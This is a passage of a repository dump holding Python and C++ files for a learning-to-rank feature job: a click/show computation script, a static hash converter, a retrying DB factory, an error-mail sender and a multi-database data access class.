show_filename)\n\tshow_click_obj.getShowData(show_filepath)\n\n\tprint \"caculate click...\"\t\n\tclick_filename = \"search-%s\" % curday[2:]\n\tclick_filepath = \"%s/temp_data/%s\" % (data_path, click_filename)\n\tshow_click_obj.getClickData(click_filepath)\n\n\tprint \"save search info ...\"\n\tsearch_log_filename = \"search_log_%s\" % curday\n\tdispath = \"%s/%s\" % (data_path, search_log_filename)\n\tsaveData(product_info_obj, show_click_obj, dispath)\n\n#\tprint \"conver data to svmrank format ...\"\t\n#\tsvmrank_filename = \"svmrank_data_%s\" % curday\n#\tsvmrank_filepath = \"%s/%s\" % (data_path, svmrank_filename)\n#\tlenght = 16\n#\tfeature_num = 23 \n#\tfeature_index = [7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22]\t\n#\tprepareSVMRankFile(dispath, svmrank_filepath, lenght, feature_num, feature_index)\n\tprint \"end !\"\t\n\t\n\n\n\nif __name__ == \"__main__\":\n\tmain()\t\n" }, { "alpha_fraction": 0.6327652335166931, "alphanum_fraction": 0.64211106300354, "avg_line_length": 21.456790924072266, "blob_id": "cda485fde8ab3bbb57ccc4fefda5e4a47949cc2a", "content_id": "ee02209925a875476bbef292a49f654d2985d8cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 91, "num_lines": 81, "path": "/bin/map2staticmap.cpp", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<string>\n#include<map>\n#include<vector>\n#include <fstream>\n\n#include\"nokey_static_hash.h\"\n\nusing namespace std;\n\n\ninline void split(const string& str, const string& sp, vector<string>& out) {\n\tout.clear();\n\tstring s = str;\n\tsize_t beg, end;\n\twhile (!s.empty()) {\n\t\tbeg = s.find_first_not_of(sp);\n\t\tif (beg == string::npos) {\n\t\t\tbreak;\n\t\t}\n\t\tend = s.find(sp, beg);\n\t\tout.push_back(s.substr(beg, end - beg));\n\t\tif (end == string::npos) {\n\t\t\tbreak;\n\t\t}\n\t\ts = s.substr(end, s.size() - end);\n\t}\n}\n\nint main(int argc, char** argv)\n{\n\tstring srcfilepath = \"../data/pid_ctr\"; //srcfile path\n\tifstream fin(srcfilepath.c_str());\n\tif(!fin)\n\t{\n\t\t//LOG_MSG_INFO(\"\\topen srcfile:pid_ranking_val.txt fail\");\n\t\tcout<<\"open srcfile:search_data_log fail\"<<endl;\n\t\treturn -1;\n\t}\n\n\t//tmp map for read data from srcfile to memory\n\tmap<int, double> m_pid_rankvalue;\n\tstring line;\n\twhile(getline(fin, line)){\n\t\tvector<string> tmp_vec;\n\t\tsplit(line, \"\\t\", tmp_vec);\n\t\tif(tmp_vec.size() != 2)\n\t\t{\n\t\t\tcontinue;\n\t\t}\n\n\t\tint pid = atoi(tmp_vec[0].c_str());\n\t\tdouble rank_val = atof(tmp_vec[1].c_str());\n\n\t\tm_pid_rankvalue[pid] = rank_val;\n\t}\n\n\tstatic_hash_map<int, double> shm_pid_rankvalue; //static_hash_map \n\tif(shm_pid_rankvalue.container_to_hash_file(m_pid_rankvalue, 15, \"../data/pid2rankvalue\"))\n\t{\n\t\t//LOG_MSG_INFO(\"\\twrite hash file success\");\n\t\tcout<<\"write hash file success\"<<endl;\n\t}\n\telse\n\t{\n\t\t//LOG_MSG_ERROR(\"\\twrite hash file fail!\");\n\t\tcout<<\"write hash file fail\"<<endl;\n\t}\n\n\t/*\t\n\tcout<<\"i am here\"<<endl;\n\tstatic_hash_map<int, double> shm_pid2value;\n \tshm_pid2value.load_serialized_hash_file(\"../data/pid2rankvalue\", 0);\n\tcout<<shm_pid2value.size()<<endl;\n\tcout<<shm_pid2value[479]<<endl;\n\t//LOG_MSG_INFO(\"WRITE HASH VALUE TO FILE END\");\n\t*/\n\tcout<<\"WRITE HASH VALUE TO FILE END\"<<endl;\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.43412625789642334, "alphanum_fraction": 0.4387008249759674, "avg_line_length": 29.774648666381836, "blob_id": "3de1427f1028b2030378b24a276093caa3231e65", "content_id": "0b6b82415e95650f56d8c6dd58569aab4607e4f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2280, "license_type": "no_license", "max_line_length": 110, "num_lines": 71, "path": "/lib/db_factory.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf8\n\nimport sys\nimport time\n\nfrom data_access_object import DataObject\n\nclass DBFactory(object):\n '''\n 多次连接数据库公用方法\n CONN_NUM 连接次数\n SLEEP_TIME 每次中断时间\n '''\n CONN_NUM = 3\n SLEEP_TIME = 5 \n\n @staticmethod\n def Connect(dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n '''\n 输入连接参数连接数据库\n '''\n num = 0\n db_conn = None\n\n while(True):\n try:\n num += 1\n db_conn = DataObject.Connect(dbtype, host, dsn, database, charset, user, password, port)\n return db_conn\n except Exception,ex:\n if num <= DBFactory.CONN_NUM:\n time.sleep(DBFactory.SLEEP_TIME)\n num += 1\n else:\n raise Exception, '(DB connect Error)%s' % ex\n \n\n @staticmethod\n def connect_conf(config,dbkey):\n '''\n 输入连接conf,以及连接对应的才conf中key连接\n '''\n num = 0\n db_conn = None\n\n while(True):\n try:\n num += 1\n db_conn = DBFactory._get_connect(config,dbkey)\n return db_conn\n except Exception,ex:\n if num <= DBFactory.CONN_NUM:\n time.sleep(DBFactory.SLEEP_TIME)\n num += 1\n else:\n raise Exception, '(DB connect Error)%s' % ex\n\n @staticmethod\n def _get_connect(config,dbkey):\n db_type = config.get(dbkey, 'db_type')\n db_conf = eval(config.get(dbkey, 'db_conf'))\n db_conn = DataObject.Connect(db_type,\n host = db_conf.get('host'),\n dsn = db_conf.get('dsn',''),\n database = db_conf.get('db'),\n charset = db_conf.get('charset',''),\n user = db_conf.get('user'),\n password = db_conf.get('passwd'),\n port = db_conf.get('port'))\n return db_conn\n\n" }, { "alpha_fraction": 0.6465652585029602, "alphanum_fraction": 0.6523334980010986, "avg_line_length": 19.717391967773438, "blob_id": "a4365870058e2be2c2811acacd146a69dc4de37a", "content_id": "d063bdd34224b3b3f0addbaa4256b7ab2ad6440c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2051, "license_type": "no_license", "max_line_length": 94, "num_lines": 92, "path": "/lib/mail_sender.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#encoding:utf8\n\n## Author : xiaominggege\n## Modited: liuxufeng\n## last change time: 2012-08-21\n## work for: 发送错误邮件,邮件内容包含了traceback信息\n## 不支持:\n##\t 附件,抄送\n\nimport os\nimport sys\nimport traceback\nimport inspect\nimport datetime\nimport smtplib, mimetypes\nfrom email.MIMEText import MIMEText\n\n\nclass MailSender(object):\n\t'''\n\t向邮箱发送错误信息\n\t用法:MailSender().SendMail(receiverlist, sub = 'AntiFraud ERROR', content= 'Error info')\n\t'''\n\tdef __init__(self):\n\t\tself.frm = \"[email protected]\"\n\t\tself.message = '' # restore the info of traceback\n\t\tself.errFilePath = ''\n\t\n\tdef write(self, str):\n\t\t'''\n\t\t把traceback信息存储必须的函数\n\t\t'''\n\t\tself.message += str\n\n\tdef __getContent(self):\n\t\t'''\n\t\t得到traceback信息\n\t\t'''\n\t\ttraceback.print_exc(file = self)\n\n\tdef __getReceiverList(self, receivers) :\n\t\t'''\n\t\t得到收件人列表\n\t\t'''\n\t\tif isinstance(receivers, list):\n\t\t\treturn ';'.join(receivers)\n\t\treturn receivers\n\n\tdef __getErrFilePath(self):\n\t\t'''\n\t\t得到发生error的文件的路径\n\t\t'''\n\t\tn = len(inspect.stack())\n\t\tcurrent_file = inspect.stack()[n-1][1]\n\t\treturn os.path.abspath(current_file)\n\t\n\tdef sendMail(self, receiver, sub = 'AntiFraud ERROR', content= 'Error info'):\n\t\t'''\n\t\t发送邮件\n\t\t'''\n\t\treceiverlist = self.__getReceiverList(receiver)\n\t\tself.__getContent()\n\t\tself.errFilePath = self.__getErrFilePath()\n\t\tcontent = \">>>%s<<<%s%s%s%s\" % (content, '\\nin: ',str(self.errFilePath), '\\n', self.message)\n\t\ttry:\n\t\t\tmsg = MIMEText(content)\n\t\t\tmsg['From'] = self.frm\n\t\t\tmsg['To'] = receiverlist\n\t\t\tmsg['Subject'] = sub\n\t\t\tsmtp_server = smtplib.SMTP('localhost')\n\t\t\tsmtp_server.sendmail(self.frm, receiver, msg.as_string())\n\t\t\tsmtp_server.quit()\n\t\texcept Exception, ex:\n\t\t\tprint 'Error when sending email'\n\t\t\traise ex\n\t#\n\ndef test():\n\treceiver = ['[email protected]']\n\tmm = MailSender()\n\ttry:\n\t\ta = int('')\n\texcept Exception, ex:\n\t\t#sub = 'Error'\n\t\t#content = 'ERror when program running'\n\t\tprint ex\n\t\tmm.sendMail(receiver)\n\n\t\nif __name__ =='__main__':\n\ttest()\n\n" }, { "alpha_fraction": 0.6179859042167664, "alphanum_fraction": 0.6268935203552246, "avg_line_length": 23.7009220123291, "blob_id": "281afe51dea68b139d29ff8b3e67102d6a478fe4", "content_id": "60cdf43b8c582f2da9e1a56e487ea4e71ca1befa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20350, "license_type": "no_license", "max_line_length": 119, "num_lines": 759, "path": "/lib/data_access_object.py", "repo_name": "magicbupt/ltr_feartures_compute_job", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n Author:yuecong\n UploadTime:2012-07-22 17:07:00\n'''\n\nimport re\nimport sys\nimport ConfigParser\n#sys.path.append('/usr/local/hive')\n\n#from hive_service import ThriftHive\n#from hive_service.ttypes import HiveServerException\nfrom thrift import Thrift\nfrom thrift.transport import TSocket\nfrom thrift.transport import TTransport\nfrom thrift.protocol import TBinaryProtocol\n \nclass DataObject(object):\n\tdef __init__(self):\n\t\tself.conn_str = []\n\t\tself.conn = None\n\t\tself.cursor = None\n\t\tself.rowcount = 0\n\t\tself.config = None\n\t\tself.tmpfile = ''\n\t\tself.debug_mode = False \n\t\treload(sys)\n\t\tsys.setdefaultencoding('utf8')\n\n\n\tdef connect(self,dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n\t\t'''\n\t\t\t连接指定的数据源,MySQL,SQLServer,Oracle,Hive\n\t\t\tparams:\n\t\t\tdbtype: 'mysql', 'mssql', 'oracle', 'hive'\n\t\t\thost: 域名或ip地址\n\t\t\tdsn: 连接oracle数据库专用\n\t\t\tcharset: 如果原生的驱动支持charset选项,则可以设置,MySQLdb, pymssql支持, cx_Oracle与HIveThrift不支持\n\t\t'''\n\t\tself.conn_str = [dbtype,host,user,password,database,port,charset]\n\n\t\t_dbtype = dbtype.lower()\n\t\t_host = host\n\t\t_dsn = dsn\n\t\t_user = user\n\t\t_password = password\n\t\t_db = database\n\t\t_port = int(port)\n\t\t_charset = charset\n\n\t\tif _dbtype == 'mysql':\n\t\t\timport MySQLdb\n\t\t\tself.conn = MySQLdb.connect(host = _host, db = _db, port = _port, charset = _charset, \\\n\t\t\t\t\t\t\t\t user = _user, passwd = _password, use_unicode = 'True')\n\t\tif _dbtype == 'mssql':\n\t\t\timport pymssql\n\t\t\tself.conn = pymssql.connect(host = _host, user = _user, password = _password, database = _db, charset = _charset) \n\n\t\tif _dbtype == 'oracle':\n\t\t\timport cx_Oracle\n\t\t\tself.conn = cx_Oracle.connect(user = _user, password = _password, dsn = _dsn)\n\n\t\tif _dbtype == 'hive':\n\t\t\ttry:\n\t\t\t\ttransport = TSocket.TSocket(host = _host, port = _port)\n\t\t\t\tself.conn = TTransport.TBufferedTransport(transport)\n\t\t\t\tself.conn.open()\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tsys.stderr.write('Hive Connection Error:%s\\n' % (tx))\n\t\t\t\tself.close()\n\t\t\t\traise SystemError, tx\n\t\treturn self\n\n\n\tdef Connect(dbtype, host = '', dsn = '', database = '', charset = '', user = '', password = '', port = 0):\n\t\t'''\n\t\t\tconnect函数的静态版\n\t\t\t返回一个DataObject连接对象\n\t\t'''\n\t\t_dbtype = dbtype.lower()\n\t\t_host = host\n\t\t_dsn = dsn\n\t\t_user = user\n\t\t_password = password\n\t\t_db = database\n\t\t_port = int(port)\n\t\t_charset = charset\n\n\t\tobj = DataObject()\n\t\treturn obj.connect(_dbtype, _host, _dsn, _db, _charset, _user, _password, _port)\n\tConnect = staticmethod(Connect)\n\n\n\tdef get_origin_conn(self):\n\t\t'''\n\t\t\t返回原生的连接对象,从而可以使用不同具体驱动的特性\n\t\t\t例如 mysql连接的DataObject对象将返回 MySQLdb对象,从而\n\t\t\t可以使用MySQLdb.connection的成员函数(方法)\n\t\t'''\n\t\treturn self.conn\n\n\n\tdef get_cursor(self):\n\t\t'''\n\t\t\t[deplicate function]\n\t\t\t在连接上获取一个cursor,最好不要直接调用\n\t\t'''\n\t\tif self.cursor:\n\t\t\tself.close_cursor()\n\n\t\tif self.conn_str[0] in ['mssql','oracle']:\n\t\t\tself.cursor = self.conn.cursor()\n\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\timport MySQLdb\n\t\t\tself.cursor = self.conn.cursor(cursorclass=MySQLdb.cursors.SSCursor)\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\tprotocol = TBinaryProtocol.TBinaryProtocol(self.conn)\n\t\t\t\tself.cursor = ThriftHive.Client(protocol)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (ex))\n\t\t\t\traise SystemError, ex\n\t\treturn self.cursor\n\n\n\tdef close_cursor(self):\n\t\t'''\n\t\t\t[deplicate function]\n\t\t\t关闭此连接对象上的cursor\n\t\t'''\n\t\tif not self.cursor:\n\t\t\treturn\n\t\ttry:\n\t\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\t\tself.cursor.close()\n\t\t\t\tself.cursor = None\n\t\t\tif self.conn_str[0] == 'hive':\n\t\t\t\tself.cursor.clean()\n\t\texcept Exception,ex:\n\t\t\tprint ex \n\n\tdef _execute(self,cursor,sql):\n\t\t# 每次execute执行之前,将上次缓存的游标影响行数清空\n\t\tself.rowcount = 0\n\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql)\n\t\t\texcept Exception, ex:\n\t\t\t\tsys.stderr.write('SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql))\n\t\t\t\traise SystemError, 'SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql)\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\tsys.stderr.write('SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql))\n\t\t\t\traise SystemError, 'SQL or Interface Error:%s\\n[SQL]:%s\\n' % (ex,sql)\n\n\n\tdef _commit(self):\n\t\tself.conn.commit()\n\n\n\tdef execute(self,sql,params={}):\n\t\t'''\n\t\t\t在连接上执行一个query,params是一个字典,用params中的值替换sql中的键\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\t#如果有参数,进行参数替换\n\t\tif len(params) != 0:\n\t\t\tsql = DataObject.Check_query(sql,params)\n\t\tself.get_cursor()\n\t\tif self.cursor == None:\n\t\t\traise NameError, 'self.cursor is not defined!\\n'\n\t\tself._execute(self.cursor, sql)\n\n\n\tdef commit(self):\n\t\t'''\n\t\t\t在非自动提交模式\n\t\t\t针对所有update, delete, insert更新操作(execute调用)\n\t\t\t执行一个提交操作\n\t\t\t只对事务性数据库有效\n\t\t'''\n\t\tself._commit()\n\n\n\tdef rollback(self):\n\t\t'''\n\t\t\t在非自动提交模式\n\t\t\t执行一个回滚操作\n\t\t\t对事务性数据库有效\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql', 'mssql', 'oracle']:\n\t\t\tself.conn.rollback()\n\t\telse:\n\t\t\traise NotSupportedError, 'hive does not support rollback'\n\n\n\tdef Get_query(configpath,title,sqlname,params = {}):\n\t\t'''\n\t\t\tget_query的静态版本\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configpath)\n\t\tsql = config.get(title,sqlname)\n\t\tsql = DataObject.Check_query(sql,params)\n\t\tsql = '\\x20'.join(sql.split('\\n'))\n\t\treturn sql\n\tGet_query = staticmethod(Get_query)\n\t\n\n\tdef get_query(self,configpath,title,sqlname,params = {}):\n\t\t'''\n\t\t\t从配置文件中获取一个sql,params是一个字典,在用值替换SQL中的键\n\t\t'''\n\t\tif not isinstance(params,dict):\n\t\t\tsys.stderr.write(\"Params Error:'%s' is not dictionary\\n\" % (params))\n\t\t\traise SystemError, \"Params Error:'%s' is not dictionary\\n\" % (params)\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configpath)\n\t\tsql = config.get(title,sqlname)\n\t\tsql = DataObject.Check_query(sql,params)\n\t\tsql = '\\x20'.join(sql.split('\\n'))\n\t\treturn sql \n\n\n\tdef create_table(self,sql):\n\t\t'''\n\t\t\t按照SQL创建一个表\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\tself._create_mysql_tbl(sql)\n\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._create_hive_tbl(sql)\n\t\t\t\t\n\n\tdef _create_hive_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef _create_mysql_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef drop_table(self,sql):\n\t\t'''\n\t\t\t按照SQLdrop一个表\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\tself._drop_mysql_tbl(sql)\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._drop_hive_tbl(sql)\n\n\n\tdef _drop_hive_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef _drop_mysql_tbl(self,sql):\n\t\tself.execute(sql)\n\n\n\tdef load_to_txt(self,sql,filepath,append=False, use_filter=True):\n\t\t'''\n\t\t\t把数据源中的数据按照SQL放入指定路径的文件中\n\t\t\tappend: 写入文件时是否使用追加的方式,True表示使用追加\n\t\t\tuse_filter: 是否过滤数据,True表示使用内部函数data_filter过滤数据,\n\t\t\t\t\t\t此选项将对性能造成较大影响\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql','mssql','oracle']:\n\t\t\tself._db_to_file(sql,filepath,append, use_filter)\n\t\t\treturn self.rowcount \n\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\tself._hive_to_file(sql,filepath,append, use_filter)\n\t\t\treturn self.rowcount\n\n\n\tdef _hive_to_file(self,sql,filepath,append, use_filter):\n\t\tfile = None\n\t\tif append == False:\n\t\t\tfile = open(filepath,'w')\n\t\telse:\n\t\t\tfile = open(filepath,'a')\n\t\tself.execute(sql)\n\t\tline = ''\n\t\twhile (1):\n\t\t\trows = self.fetchmany(1000)\n\t\t\tif len(rows) == 0:\n\t\t\t\tbreak\n\t\t\tfor row in rows:\n\t\t\t\tfields = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#过滤字段中的特殊字符\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t fields.append(self.data_filter(item))\n\t\t\t\t\t#不过滤\n\t\t\t\t\telse:\n\t\t\t\t\t fields.append(item)\n\t\t\t\tline = '\\t'.join(fields) + '\\n'\n\t\t\t\tfile.write(line)\n\t\t\t\tfile.flush()\n\t\t# ed while\n\t\tfile.close()\n\n\n\tdef _db_to_file(self,sql,filepath,append, use_filter):\n\t\tfile = None\n\t\tif append == False:\n\t\t\tfile = open(filepath,'w')\n\t\telse:\n\t\t\tfile = open(filepath,'a')\n\t\tself.execute(sql)\n\t\twhile(True):\n\t\t\trows = self.fetchmany(1000)\n\t\t\tif len(rows) <= 0:\n\t\t\t\tbreak\n\t\t\tfor row in rows:\n\t\t\t\tfields = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#数据清洗\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t\tfields.append(self.data_filter(item))\n\t\t\t\t\t#不清洗\n\t\t\t\t\telse:\n\t\t\t\t\t\tfields.append(self.to_str(item))\n\t\t\t\tline = '\\t'.join(fields) + '\\n'\t\n\t\t\t\tfile.write(line)\n\t\t\t\tfile.flush()\n\t\t#END WHILE\n\t\tfile.close()\n\n\n\tdef check_query(self,sql,params):\n\t\t'''\n\t\t\t[duplicate function]\n\t\t\t检查SQL是否符合规范, 不要直接调用\n\t\t'''\n\t\tif len(params) != 0:\n\t\t\ttry:\n\t\t\t\tfor key in params:\n\t\t\t\t\tif params.get(key) == None:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params has no Value' % (key)\n\t\t\t\t\tif sql.find(('%s' % key)) == -1:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params is not in [SQL]:%s' % (key,sql)\n\t\t\t\t\tvar = '%s' % key\n\t\t\t\t\tval = \"%s\" % params.get(key)\n\t\t\t\t\tsql = sql.replace(var,val)\n\t\t\texcept AttributeError, ex:\n\t\t\t\tsys.stderr.write('%s\\n' % ex)\n\t\t\t\traise SystemError, ex\n\t\treturn sql\n\n\n\tdef Check_query(sql,params):\n\t\t'''\n\t\t\tcheck_query的静态版本\n\t\t'''\n\t\tif len(params) != 0:\n\t\t\ttry:\n\t\t\t\tfor key in params:\n\t\t\t\t\tif params.get(key) == None:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params has no Value' % (key)\n\t\t\t\t\tif sql.find(('%s' % key)) == -1:\n\t\t\t\t\t\traise AttributeError, 'AttributeError:key(%s) in params is not in [SQL]:%s' % (key,sql)\n\t\t\t\t\tvar = '%s' % key\n\t\t\t\t\tval = \"%s\" % params.get(key)\n\t\t\t\t\tsql = sql.replace(var,val)\n\t\t\texcept AttributeError, ex:\n\t\t\t\tsys.stderr.write('%s\\n' % ex)\n\t\t\t\traise SystemError, ex\n\t\treturn sql\n\tCheck_query = staticmethod(Check_query)\n\n\n\tdef load_from_txt(self,filepath,tblname,replace=False,fields_trnr='\\t'):\n\t\t'''\n\t\t\tload_to_txt的配对函数,用于把文件中的数据load进新数据源\n\t\t\t要求目标数据的schema已经存在\n\t\t\t目前只支持 all ---> mysql 与 all ---> hive方式\n\t\t\ttblname: 目标表名或是库.表 名\n\t\t\treplace: load数据时,遇见相同的行是否用新行替换,True表示替换\n\t\t\tfields_trnr: load时,数据文件字段分割符\n\t\t'''\n\t\tif self.conn_str[0] in ['mysql']:\n\t\t\treturn self._load_to_mysql(filepath,tblname,replace,fields_trnr)\n\t\tif self.conn_str[0] in ['mssql']:\n\t\t\tsys.stderr.write('SQL Server Load Program is not ready yet\\n')\n\t\tif self.conn_str[0] in ['hive']:\n\t\t\treturn self._load_to_hive(filepath,tblname)\n\n\n\tdef _load_to_mysql(self,filepath,tblname,replace,fields_trnr):\n\t\t\tpredo = 'SET max_error_count = 0; '\n\t\t\tif replace == True:\n\t\t\t\tsql = \"LOAD DATA LOCAL INFILE '%s' REPLACE INTO TABLE %s CHARACTER SET UTF8 FIELDS TERMINATED BY \" \\\n\t\t\t\t\t \"'%s' ENCLOSED BY '%s'; \" % (filepath, tblname, fields_trnr, '\\\"')\n\t\t\telse:\n\t\t\t\tsql = \"LOAD DATA LOCAL INFILE '%s' IGNORE INTO TABLE %s CHARACTER SET UTF8 FIELDS TERMINATED BY \" \\\n\t\t\t\t\t \"'%s' ENCLOSED BY '%s'; \" % (filepath, tblname, fields_trnr, '\\\"') \n\t\t\ttry:\n\t\t\t\tself.execute(predo)\n\t\t\texcept Error, ex:\n\t\t\t\traise SystemError, '(MySQL LOAD DATA ERROR)%s' % ex\n\n\t\t\ttry:\n\t\t\t\tself.execute(sql)\n\t\t\t\tself.commit()\n\t\t\texcept Error, ex:\n\t\t\t\traise SystemError, '(MySQL LOAD DATA ERROR)%s' % ex\n\n\n\tdef _load_to_hive(self,filepath,tblname):\n\t\t\tsql = 'LOAD DATA LOCAL INPATH ' + \"'\" + filepath + \"'\" + ' INTO TABLE ' + tblname\n\t\t\ttry:\n\t\t\t\tself.execute(sql)\n\t\t\texcept Thrift.TException, ex:\n\t\t\t\traise SystemError, '(HIVE LOAD DATA ERROR)%s' % ex\n \n\n\tdef _load_to_oracle(self,filepath,tblname):\n\t\tpass\n\n\n\tdef Insert_as_select(src,dest,sql,tblname,replace = False, use_filter = True):\n\t\t'''\n\t\t\t此函数先对数据源src(hive, mysql, oracle, sqlserver)上执行一个查询\n\t\t\t然后在dest(仅限mysql)上根据查询的结果集迭代的执行insert\n\t\t\t这一对儿动作是一个原子操作\n\t\t\t目前支持 all ---> mysql 方式\n\t\t\tsrc: 源连接 DataObject对象\n\t\t\tdest: 目标连接 DataObject对象\n\t\t\treplace, use_filter同load_from_txt()\n\t\t'''\n\t\tif dest.conn_str[0] in ['mysql']:\n\t\t\tcursor = dest.conn.cursor()\n\t\t\tcursor.execute('set autocommit = 1')\n\t\t\tcursor.execute('set max_error_count = 0')\n\t\t\tcursor.close()\n\t\t\n\t\tsrc.execute(sql)\n\t\twhile (1):\n\t\t\t#按源数据库的类型拿到要插入的数据集\n\t\t\trows = src.fetchmany(1000)\n\t\t\tif len(rows) <= 0:\n\t\t\t\tbreak\n\t\t\tdataset = []\n\t\t\tfor row in rows:\n\t\t\t\tinner_lst = []\n\t\t\t\tfor item in row:\n\t\t\t\t\t#数据清洗\n\t\t\t\t\tif use_filter:\n\t\t\t\t\t\titem = src.data_filter(item)\n\t\t\t\t\t#不清洗\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = src.to_str(item)\n\t\t\t\t\tinner_lst.append(item)\n\t\t\t\tdataset.append(inner_lst)\n\t\t\t#数据合并,按目标数据库类型的不同执行不同的合并函数\n\t\t\ttry:\n\t\t\t\tif dest.conn_str[0] in ['mysql']:\n\t\t\t\t\tDataObject._Insert_to_mysql_select(dest,dataset,tblname,replace)\n\t\t\t\tif dest.conn_str[0] in ['hive']:\n\t\t\t\t\traise ValueError, \"ValueError:Hive does not support 'Insert' Mutipulation\"\n\t\t\t\tif dest.conn_str[0] in ['Oracle']:\n\t\t\t\t\traise SystemError, \"Exit Request:Oracle does not yet supported\"\n\t\t\texcept (ValueError,SystemError), ex:\n\t\t\t\tsys.stderr.write('%s\\n' % (ex))\n\t\t\t\traise SystemError, ex\n\t\treturn dest.rowcount\n\tInsert_as_select = staticmethod(Insert_as_select)\n\n\n\tdef _Insert_to_mysql_select(dest,dataset,tblname,replace):\n\t\tif replace == True:\n\t\t\tfor row in dataset:\n\t\t\t\tcursor = dest.conn.cursor()\n\t\t\t\tsql = \"REPLACE INTO %s VALUES (\" % (tblname)\n\t\t\t\tfor item in row:\n\t\t\t\t\tif item in [\"''\",'\"\"']:\n\t\t\t\t\t\tsql += \"'',\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tsql += \"'%s',\" % (item)\n\t\t\t\tsql = sql[:-1] + ');'\n\t\t\t\tcursor.execute(sql)\n\t\t\t\tdest.rowcount += 1\n\t\t\t\tcursor.close()\n\t\telse:\n\t\t\tfor row in dataset:\n\t\t\t\tcursor = dest.conn.cursor()\n\t\t\t\tsql = \"INSERT IGNORE INTO %s VALUES (\" % (tblname)\n\t\t\t\tfor item in row:\n\t\t\t\t\tif item in [\"''\",'\"\"']:\n\t\t\t\t\t\tsql += \"'',\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tsql += \"'%s',\" % (item)\n\t\t\t\tsql = sql[:-1] + ');'\n\t\t\t\tcursor.execute(sql)\n\t\t\t\tdest.rowcount += 1\n\t\t\t\tcursor.close()\n\t_Insert_to_mysql_select = staticmethod(_Insert_to_mysql_select)\n\n\n\tdef _Insert_to_oracle_select(dest,dataset,tblname):\n\t\tpass\n\t_Insert_to_oracle_select = staticmethod(_Insert_to_oracle_select)\n\n\n\tdef fetchmany(self,count):\n\t\t'''\n\t\t\t没什么,就是fetchmany\n\t\t\tcount为一次迭代取的行数\n\t\t'''\n\t\tif not self.cursor:\n\t\t\traise NameError, 'self.cursor is not defined!\\n'\n\t\tresult = []\n\t\tif self.conn_str[0] == 'mssql':\n\t\t\tresult = self.cursor.fetchmany(count)\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'mysql':\n\t\t\tresult = self.cursor.fetchmany(count)\n\t\t\tself.rowcount += len(result)\n\n\t\tif self.conn_str[0] == 'oracle':\n\t\t\tresult = self.cursor.fetchmany(count)\n\t\t\tself.rowcount = self.cursor.rowcount\n\n\t\tif self.conn_str[0] == 'hive':\n\t\t\ttry:\n\t\t\t\trows = self.cursor.fetchN(count)\n\t\t\t\tif len(rows) <= 0:\n\t\t\t\t\treturn result\n\t\t\t\tfor row in rows:\n\t\t\t\t\tlist = row.split('\\t')\n\t\t\t\t\tresult.append(list)\n\t\t\t\tself.rowcount += len(rows)\n\t\t\texcept Thrift.TException, tx:\n\t\t\t\tself.close()\n\t\t\t\tsys.stderr.write('%s\\n' % (tx))\n\t\t\t\traise SystemError, tx\n\t\treturn result\n\n\n\tdef 